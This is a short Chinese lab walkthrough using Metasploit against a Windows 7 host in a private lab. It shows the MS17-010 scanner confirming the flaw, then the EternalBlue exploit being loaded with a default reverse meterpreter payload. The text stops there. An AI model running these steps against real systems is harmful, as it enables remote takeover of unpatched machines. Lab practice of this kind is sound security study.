实验环境:
kali攻击机(192.168.98.30)
win7目标机(192.168.98.35)
实验步骤:
1、 先对目标主机进行扫描确认是否存在漏洞
msfdb run
sf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.98.35
rhosts => 192.168.98.35
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
目标机存在 MS17-010 漏洞
2、开始漏洞利用
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse